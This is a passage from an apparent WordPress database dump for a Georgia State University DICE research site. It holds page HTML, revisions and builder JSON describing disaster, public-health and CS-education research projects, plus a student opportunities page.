models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c45\" id=\"about-7\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-873 style-local-126-c45 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c46\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-874 style-local-126-c46 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-875-outer style-local-126-c47-outer\">\n            <div data-colibri-id=\"126-c47\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-875 style-local-126-c47 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c48\" class=\"h-global-transition-all h-heading style-876 style-local-126-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-876 style-local-126-c48\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">DICE Data Repository</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c50\" class=\"h-text h-text-component style-878 style-local-126-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(64, 85, 169);\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;</span></p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-879-outer style-local-126-c51-outer\">\n            <div data-colibri-id=\"126-c51\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-879 style-local-126-c51 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',126,'https://gsudice.dataconn.net/?p=1564',0,'revision','',0),(1573,1,'2023-09-29 11:24:06','2023-09-29 15:24:06','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n            <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"1573-c5\" class=\"h-text h-text-component style-893 style-local-1573-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <h4><strong>Funded Research</strong></h4>\n                    <p><em>There are no funded opportunities open at this time.</em></p>\n                    <h4><strong>Graduate Thesis</strong></h4>\n                    <p><em style=\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\">There are no opportunities open at this time.</em></p>\n                    <h4><strong>Graduate Projects</strong></h4>\n                    <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n                    <h4><strong>Undergraduate Research</strong></h4>\n                    <p><em style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Student Opportunities','','publish','closed','closed','','colibri-1573','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',0,'https://gsudice.dataconn.net/?page_id=1573',0,'page','',0),(1574,1,'2023-09-29 11:24:06','2023-09-29 15:24:06','','Colibri #1573','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:24:06','2023-09-29 15:24:06','',1573,'https://gsudice.dataconn.net/?p=1574',0,'revision','',0),(1576,1,'2023-09-29 11:36:36','2023-09-29 15:35:59',' ','','','publish','closed','closed','','1576','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=1576',4,'nav_menu_item','',0),(1577,1,'2023-09-29 11:35:59','2023-09-29 15:35:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"id\":\"1573-c4\",\"parentId\":\"1573-c3\",\"partialId\":1573,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"1573-c4\",\"index\":0,\"id\":\"1573-c5\",\"partialId\":1573,\"styleRef\":893,\"type\":\"content\",\"props\":{\"content\":\"<h4><strong>Funded Research<\\/strong><\\/h4><p><em>There are no funded opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Thesis<\\/strong><\\/h4><p><em style=\\\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\\\">There are no opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Projects<\\/strong><\\/h4><p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)<\\/em><\\/p><h4><strong>Undergraduate Research<\\/strong><\\/h4><p><em style=\\\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\\\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)<\\/em><\\/p><p><br><\\/p>\"}}],\"styleRef\":883,\"type\":\"content\"}],\"id\":\"1573-c3\",\"parentId\":\"1573-c2\",\"partialId\":1573,\"styleRef\":882,\"type\":\"content\"}],\"id\":\"1573-c2\",\"parentId\":\"1573-c1\",\"partialId\":1573,\"styleRef\":881,\"type\":\"content\"}],\"id\":\"1573-c1\",\"partialId\":1573,\"styleRef\":880,\"type\":\"content\"}','','','publish','closed','closed','','1577','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=1577',0,'extb_post_json','',0),(1578,1,'2023-09-29 11:35:59','2023-09-29 15:35:59','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n            <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"1573-c14\" class=\"h-text h-text-component style-893 style-local-1573-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <h4><strong>Funded Research</strong></h4>\n                    <p><em>There are no funded opportunities open at this time.</em></p>\n                    <h4><strong>Graduate Thesis</strong></h4>\n                    <p><em style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\">There are no funded opportunities open at this time.</em></p>\n                    <h4><strong>Graduate Projects</strong></h4>\n                    <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n                    <h4><strong>Undergraduate Research</strong></h4>\n                    <p><em style=\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Colibri #1573','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:35:59','2023-09-29 15:35:59','',1573,'https://gsudice.dataconn.net/?p=1578',0,'revision','',0),(1583,1,'2023-09-29 11:36:25','2023-09-29 15:36:25','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-boxed-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\r\n            <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"1573-c14\" class=\"h-text h-text-component style-893 style-local-1573-c14 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <h4><strong>Funded Research</strong></h4>\r\n                    <p><em>There are no funded opportunities open at this time.</em></p>\r\n                    <h4><strong>Graduate Thesis</strong></h4>\r\n                    <p><em style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\">There are no funded opportunities open at this time.</em></p>\r\n                    <h4><strong>Graduate Projects</strong></h4>\r\n                    <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\r\n                    <h4><strong>Undergraduate Research</strong></h4>\r\n                    <p><em style=\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\r\n                    <p>\r\n                      <br>\r\n                    </p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Student Opportunities','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:36:25','2023-09-29 15:36:25','',1573,'https://gsudice.dataconn.net/?p=1583',0,'revision','',0),(1585,1,'2023-09-29 11:37:59','2023-09-29 15:37:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"id\":\"1573-c4\",\"parentId\":\"1573-c3\",\"partialId\":1573,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"1573-c4\",\"index\":0,\"id\":\"1573-c5\",\"partialId\":1573,\"styleRef\":893,\"type\":\"content\",\"props\":{\"content\":\"<h4><strong>Funded Research<\\/strong><\\/h4><p><em>There are no funded opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Thesis<\\/strong><\\/h4><p><em style=\\\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\\\">There are no opportunities open at this time.<\\/em><\\/p><h4><strong>Graduate Projects<\\/strong><\\/h4><p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)<\\/em><\\/p><h4><strong>Undergraduate Research<\\/strong><\\/h4><p><em style=\\\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\\\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)<\\/em><\\/p><p><br><\\/p>\"}}],\"styleRef\":883,\"type\":\"content\"}],\"id\":\"1573-c3\",\"parentId\":\"1573-c2\",\"partialId\":1573,\"styleRef\":882,\"type\":\"content\"}],\"id\":\"1573-c2\",\"parentId\":\"1573-c1\",\"partialId\":1573,\"styleRef\":881,\"type\":\"content\"}],\"id\":\"1573-c1\",\"partialId\":1573,\"styleRef\":880,\"type\":\"content\"}','','','inherit','closed','closed','','1577-revision-v1','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',1577,'https://gsudice.dataconn.net/?p=1585',0,'revision','',0),(1586,1,'2023-09-29 11:37:59','2023-09-29 15:37:59','<div data-colibri-id=\"1573-c1\" class=\"style-880 style-local-1573-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"1573-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-881 style-local-1573-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"1573-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-882 style-local-1573-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-883-outer style-local-1573-c4-outer\">\n            <div data-colibri-id=\"1573-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-883 style-local-1573-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"1573-c5\" class=\"h-text h-text-component style-893 style-local-1573-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <h4><strong>Funded Research</strong></h4>\n                    <p><em>There are no funded opportunities open at this 